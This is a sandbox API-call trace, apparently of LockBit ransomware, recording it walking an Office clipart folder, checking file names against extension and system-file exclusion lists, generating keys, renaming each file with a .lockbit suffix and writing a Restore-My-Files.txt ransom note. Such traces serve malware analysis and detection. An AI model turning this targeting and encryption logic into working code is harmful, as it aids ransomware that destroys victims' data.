[0146.787] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153299.WMF") returned 1 [0146.787] lstrcmpiW (lpString1="ntldr", lpString2="J0153299.WMF") returned 1 [0146.787] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153299.WMF") returned 1 [0146.787] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153299.WMF") returned -1 [0146.787] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153299.WMF") returned -1 [0146.787] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153299.WMF") returned 1 [0146.787] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153299.WMF") returned -1 [0146.787] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.787] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned=".WMF" [0146.787] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.787] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.788] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.788] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.lockbit") returned 72 [0146.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.789] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.789] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.789] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=36620) returned 1 [0146.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.790] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.790] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.794] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.794] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.794] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.796] free (_Block=0x1fa2ed8) [0146.796] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.796] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.796] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7850, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153302.WMF", cAlternateFileName="")) returned 1 [0146.796] lstrcmpiW (lpString1=".", lpString2="J0153302.WMF") returned -1 [0146.796] lstrcmpiW (lpString1="..", lpString2="J0153302.WMF") returned -1 [0146.796] PathFindExtensionW (pszPath="J0153302.WMF") returned=".WMF" [0146.796] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.796] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.797] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.797] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153302.WMF") returned 1 [0146.797] lstrcmpiW (lpString1="ntldr", lpString2="J0153302.WMF") returned 1 [0146.798] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153302.WMF") returned 1 [0146.798] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153302.WMF") returned -1 [0146.798] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153302.WMF") returned -1 [0146.798] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153302.WMF") returned 1 [0146.798] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153302.WMF") returned -1 [0146.798] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.798] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned=".WMF" [0146.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.798] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.798] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.799] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.799] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.lockbit") returned 72 [0146.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.800] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.800] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.800] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=30800) returned 1 [0146.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.801] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.805] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.805] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.807] free (_Block=0x1fa2ed8) [0146.807] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.807] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.807] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9658, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153305.WMF", cAlternateFileName="")) returned 1 [0146.807] lstrcmpiW (lpString1=".", lpString2="J0153305.WMF") returned -1 [0146.807] lstrcmpiW (lpString1="..", lpString2="J0153305.WMF") returned -1 [0146.807] PathFindExtensionW (pszPath="J0153305.WMF") returned=".WMF" [0146.807] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.807] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.808] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.808] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153305.WMF") returned 1 [0146.808] lstrcmpiW (lpString1="ntldr", lpString2="J0153305.WMF") returned 1 [0146.808] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153305.WMF") returned 1 [0146.808] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153305.WMF") returned -1 [0146.808] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153305.WMF") returned -1 [0146.809] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153305.WMF") returned 1 [0146.809] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153305.WMF") returned -1 [0146.809] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.809] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned=".WMF" [0146.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.809] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.809] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.810] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.810] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.810] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.810] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.lockbit") returned 72 [0146.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.810] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.811] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.811] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=38488) returned 1 [0146.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.812] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.815] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.815] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.815] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.817] free (_Block=0x1fa2ed8) [0146.817] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.818] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.818] CreateFileW 